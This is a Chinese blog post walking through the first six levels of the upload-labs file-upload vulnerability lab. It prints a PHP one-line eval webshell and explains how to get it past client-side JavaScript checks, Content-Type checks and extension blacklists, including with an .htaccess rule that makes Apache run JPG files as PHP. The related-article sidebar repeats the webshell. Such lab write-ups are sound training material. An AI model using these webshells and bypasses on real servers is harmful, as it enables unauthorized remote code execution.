upload-labs 靶场 1-6

最新推荐文章于 2024-04-18 12:13:09 发布
最新推荐文章于 2024-04-18 12:13:09 发布
阅读量1.1k 收藏
点赞数 2
分类专栏: 靶场 文章标签: javascript 开发语言 ecmascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lee_maple/article/details/121295031
版权

检查方式:

先说测试木马上传是否成功的检测方式(我使用的一句话木马为↓)

<?php @eval($_POST['pass']); ?>

①利用Hackbar发送一个POST指令?pass=phpinfo();

如果上传成功则会出现php版本信息

②使用中国蚁剑选择添加数据输入链接URL输入密码,选择测试连接

如果上传成功则可以在蚁剑中查看靶机的所有数据内容

一、pass01

(1)首先我们尝试下上传一个php文件,发现文件类型被限制了

 (2)查看源码

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

(3)发现是使用js代码对文件类型进行限制。

我们使用火狐浏览器默认的开发者工具,选择禁用js,然后上传PHP文件即可。

二、pass02

按照第一题的方法不能上传,我们尝试一下用抓包改包修改文件上传类型

(1)对上传过程进行抓包,修改连接类型,然后连接即可

 三、pass03

发现前两题的办法均不能使用,查看源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

可以看到代码使用黑名单来过滤,我们可以采用畸形文件名来解决,如:php、php3、php4、php5、phtml、pht这些后缀是可以被解析的,其他语言也有类似的情况,需要多次尝试

但我们需要配置Apache的httptd.conf文件

向该文件中结尾加入

AddType application/x-httpd-php .php .phtml .php5 .php3即可

步骤与第三题相同

四、pass04

第四题直接进制常见的.asp|.aspx|.php|.jsp等常见后缀文件,但是又一种文件格式没禁用,那就是
.htaccess

启用.htaccess,需要修改httpd.conf,启用AllowOverride(将该值改为all),并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名,可以用AccessFileName指令来改变。例如,需要使用.config ,则可以在服务器配置文件中按以下方法配置:AccessFileName .config 。

然后先上传,htaccess文件,文件内容如下

AddType application/x-httpd-php jpg

.htaccess文件的内容的意思是 对2.jpg使用php重新解析
然后再上传jpg脚本(注意.htaccess文件不要添加前缀名,电脑无法解析)

五、pass05

六、pass06

观察源码我们可以发现,本题把.htaccess文件也禁用了。但是认真对比与第四题的代码,本题去掉了大小写绕过的逃逸。

枫糖丶
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
中国蚁剑安装使用教程
天天学安全专属博客
03-29 1万+
中国蚁剑安装教程,中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。如上主要包括蚁剑的下载,连接一句话木马,更改木马连接参数,绕过WAF。
php代码命令执行漏洞-常见危险函数
qq_41272376的博客
02-16 4860
php代码/命令执行漏洞-常见危险函数 php代码执行相关 eval() mixed eval ( string $code ) 把字符串code作为php代码执行。常见的一句话木马: <?php eval($_GET['pass']) ?> 访问: http://xxx/codeexec.php?pass=phpinfo(); 得到phpinfo()页面。 assert() PHP 5 bool assert ( mixed $assertion [, string $desc
Upload LABS Pass-6_uploadslabs第6关,2024年最新字节网络安全高级岗
最新发布
2401_83621541的博客
04-18 301
后台校验文件后缀名时,由于后缀名多了一个空格,导致黑名单匹配不到,从而放行 , 文件传输至文件目录下的时候,系统会自动过滤后缀名的空格,使文件可以正常使用。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。第六关在后端使用了黑名单 , 并过滤了大小写和点 , 但未过滤空格 , 我们使用代理抓包在后缀名中添加空格,即可绕过黑名单。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
upload-labs黑名单绕过通关(1-11关)
weixin_43509478的博客
10-22 480
方法二:str_ireplace函数只替换了一次关键字符,可以通过::$DATA双写的方式,绕过上传检验,文件名+::$D::$DATAATA。在windows中文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的就是不检查后缀。看代码与前面几关对比,缺少删除.的函数,使用BP,上传图片马,修改为php.对比上一关,少了::$DATA过滤,上传图片马,改后缀加::$DATA上传。和第五关类似,就是禁止上传.user.ini文件。
upload-labs 1-6关学习笔记
weixin_51151498的博客
10-27 793
简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共21关,每一关都包含着不同上传方式。
向中国菜刀致敬!中国蚁剑
血色苍穹
11-02 3813
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员已近进行常规操作的网站管理员。 任何人不得将其用于非法用途以及盈利等目的,也禁止未经允许私自修改打包进行发布,否则后果自行承担并将追究其相关责任! Windows安装蚁剑 中国蚁剑从V2.0.0-beta版本开始,引入了加载器。用户/开发者只需要下载对应平台的加载器,无需安装额外的环境,即可对源代码进行编译/执行/调试等...
安装upload-labs
10-22
1. 下载靶场文件:首先,您需要下载upload-labs靶场文件,可以从官方网站或其他可靠的渠道下载。 2. 解压到WWW目录下:将下载的靶场文件解压到WWW目录下,请注意不要嵌套文件夹,否则可能会导致安装失败。 3. 启动...
upload-labs靶场通关指南
07-02
Upload-labs靶场通关指南 Upload-labs靶场是一款文件上传漏洞靶场,旨在帮助安全研究员和渗透测试人员练习文件上传漏洞的检测和利用。本指南提供了 Upload-labs靶场的通关指南,涵盖了从基础的文件上传漏洞到高级...
上传文件漏洞靶场upload-labs
09-27
【上传文件漏洞靶场upload-labs】是一个专为网络安全爱好者和初学者设计的实践平台,主要目的是帮助用户深入了解和练习上传文件漏洞。在Web应用程序中,上传功能常常因为设计不当而成为攻击者利用的安全隐患。这个...
upload-labs-master.zip
06-22
【标题】"upload-labs-master.zip" 是一个用于学习和实践文件上传漏洞的靶场项目。这个压缩包包含了 "upload-labs-master" 目录的多次副本,这可能表示靶场设计的不同阶段或者不同的练习环境。 【描述】描述中的 ...
PHP代码审计:文件上传(.user.ini)绕过
qq_22132931的博客
10-24 1094
php代码审计
PHP中的危险函数全解析
★昔梦无痕★
08-12 1327
在编译 PHP 时,如无特殊需要,一定禁止编译生成 CLI 命令行模式的 PHP 解析支持。可在编译时使用 –disable-CLI。一旦编译生成 CLI 模式的PHP,则可能会被入侵者利用该程序建立一个WEB Shell 后门进程或通过PHP 执行任意代码。phpinfo()功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。危险等级:中passthru()功
PHPInfo()信息泄漏漏洞利用及提权
热门推荐
weixin_44023460的博客
12-08 3万+
Simeon PHPInfo函数信息泄露漏洞常发生一些默认的安装包,比如phpstudy等,默认安装完成后,没有及时删除这些提供环境测试的文件,比较常见的为phpinfo.php、1.php和test.php,虽然通过phpinfo获取的php环境以及变量等信息,但这些信息的泄露配合一些其它漏洞将有可能导致系统被渗透和提权。 1.1phpinfo函数 PHP中提供了PHPInfo()函数,该函数返...
upload-labs】文件上传通关攻略
kkza的博客
11-02 3672
pass-01 源码解析: function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.png|.gif"
风炫安全web安全学习第三十六节课-15种上传漏洞讲解(一)
风炫的博客
01-06 242
风炫安全web安全学习第三十六节课 15种上传漏洞讲解(一) 文件上传漏洞 0x01 漏洞描述和原理 文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。 网站web应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上传功能的实现代码没有严格校验上传文件的后缀和文件类型,此时攻击者就可以上传一个webshel
文件上传漏洞靶场:upload-labs安装+第一关教程(一)
北风
12-04 2万+
注:本文仅供学习使用,请勿用于非法操作,后果与作者无关!记录一下自己的学习过程,大佬勿喷!! 一、简介 upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上传方式。 二、安装 upload-labs 由于upload-labs 是一个由php 语言编写的靶场,因此需要...
文件上传漏洞靶场:upload-labs安装+1~11关
weixin_44522540的博客
03-13 605
文章目录一、安装二、pass-01 js检查三、pass-02 只验证Content-type四、pass-03 黑名单绕过五、pass-04 htaccess绕过六、pass-05 大小写绕过 一、安装 phpstudy下载地址:https://www.xp.cn/download.html upload-labs下载地址:https://github.com/Tj1ngwe1/upload-labs 以windows下phpstudy2018为例: 下载upload-labs后,解压,将文件名改为u
文件上传漏洞靶场upload-labs学习(pass6-pass10)
AFCC_的博客(Web_Dog)
03-06 3105
0X00 Pass6 第6关从后缀绕过的角度考察,源码为: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3"
upload-labs靶场搭建教程
08-19
你可以按照以下步骤来搭建upload-labs靶场: 1. 首先,你可以使用以下命令将upload-labs镜像拉取到本地仓库: docker pull cuer/upload-labs [1] 2. 接下来,你可以在镜像仓库中搜索upload-labs镜像,使用以下命令:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

枫糖丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值